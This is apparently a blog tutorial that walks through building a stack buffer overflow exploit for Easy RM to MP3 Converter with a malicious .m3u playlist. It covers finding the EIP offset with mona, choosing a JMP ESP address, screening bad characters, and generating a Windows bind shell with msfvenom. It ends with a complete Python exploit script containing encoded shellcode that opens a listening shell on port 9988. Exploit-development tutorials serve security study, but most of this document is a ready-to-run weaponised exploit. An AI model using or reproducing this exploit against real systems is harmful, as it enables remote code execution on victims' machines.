Easy RM to MP3 Converter

  2014-05-25


Prequisites

Identifying the Vulnerability

First of all we need to identify the appropriate buffer size for the exploit. To do this, we simply execute the following python script.

1 buffer = "A" * 30000
2 
3 filename="evil.m3u"
4 evilfile = open(filename , 'w')
5 evilfile.write(buffer)
6 evilfile.close()

Identifying EIP Offset

Subsequently, open up the resulting playlist in the converter. Boom, the application crashes.

Register values at the access violation. EIP was overwritten with AAAA

It seems that we can simply overwrite EIP. In order to identify the correct offset of the overflow let’s create a pattern and start again.

!mona pc 5000

For this run 25k As are followed by the pattern. This time we directly start the application via Immunity. The application crashes and we now have a unique pattern stored in EIP.

Identifying the offset of EIP with a unique pattern.

When the debugger stops because of the overflow we can identify the correct offset for our custom EIP.

!mona findmsp
Mona helps in identifying the offset for the EIP overwrite (offset 1109).

The offset for EIP is 25000 + 1109 = 26109. Subsequently, this allows an update of the exploit script in order to reflect the newly acquired knowledge. This gives us power over EIP.

Verifying the offset by overwriting EIP with BBBB.

Controlling EIP

The next step is to jump to a shellcode. Mona helps finding an appropriate address in memory.

!mona jmp -r esp
Moan.py lists the possible JMP ESP instructions.

For this exploit the instruction at 0x77c72eee was chosen. This allows us to jump to ESP.

Identifying Bad Characters

As ESP points to 0x000FF730 (EIP+4) we can place our shellcode at the specific location. Before generating a payload, we also have to check for bad characters. Mona also provides help and can create an array with excluded characters.

!mona bytearray -b '\x00\x0A'

The array has to be included in the buffer. Subsequently, bad characters can be identified in a debugger.

The byte array in memory is used to identify bad characters.

Mona also provides a command to help with this step of exploit development.

!mona compare -f bytearray.bin

Adding Shellcode

After iterating the above process in order to identify all bad characters a payload can be create. Metasploit provides numerous payloads to choose from. Most importantly, the payload has to be encoded as to eliminate any bad characters.

msfvenom -p windows/console_bind_tcp LPORT=9988 -f python --platform win --arch x86 -b '\x00\x0a\x0d'

The Exploit

Following this, the payload has to be added to the exploit script. The final step is to create the malicious m3u file and manually load it into the software.

 1 #!/usr/bin/python -w
 2 
 3 import struct
 4 
 5 #-------------------------------------------------------------------------------------------------------#
 6 # msfvenom -p windows/console_bind_tcp LPORT=9988 -f python --platform win --arch x86 -b '\x00\x0A\x0D' #
 7 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                                          #
 8 #-------------------------------------------------------------------------------------------------------#
 9 shellcode = (
10 "\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
11 "\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
12 "\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
13 "\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
14 "\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
15 "\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
16 "\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
17 "\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
18 "\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
19 "\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
20 "\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
21 "\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
22 "\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
23 "\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
24 "\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
25 "\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
26 "\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
27 "\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
28 "\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
29 "\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
30 "\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
31 "\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
32 "\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
33 "\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
34 "\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
35 
36 buffer = "A" * 26109
37 buffer += struct.pack('< L',0x77c72eee) # jmp esp [msv1_0.dll]
38 buffer += "\x90" * 25
39 buffer += shellcode
40 buffer += "C" * (30000-len(buffer))
41 
42 filename="evil.m3u"
43 evilfile = open(filename , 'w')
44 evilfile.write(buffer)
45 evilfile.close()

By loading the m3u file, the payload is executed.

Local listening services before and after bind shell is started by opening the custom m3u file

Links and References